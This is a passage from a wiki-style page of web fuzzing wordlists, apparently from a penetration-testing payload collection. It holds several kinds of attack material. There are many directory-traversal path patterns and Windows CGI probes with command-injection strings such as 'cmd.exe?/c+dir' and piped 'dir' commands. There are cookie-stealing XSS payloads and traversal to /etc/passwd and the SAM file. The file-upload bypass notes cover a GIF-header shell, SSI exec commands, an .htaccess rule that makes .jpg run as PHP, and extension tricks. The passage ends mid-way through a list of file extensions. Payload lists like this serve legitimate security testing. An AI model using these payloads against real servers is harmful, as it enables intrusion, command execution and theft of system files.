..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI   (Update: 17 March 2010)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 s ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (&amp;lt;pre&amp;gt;Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863 ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
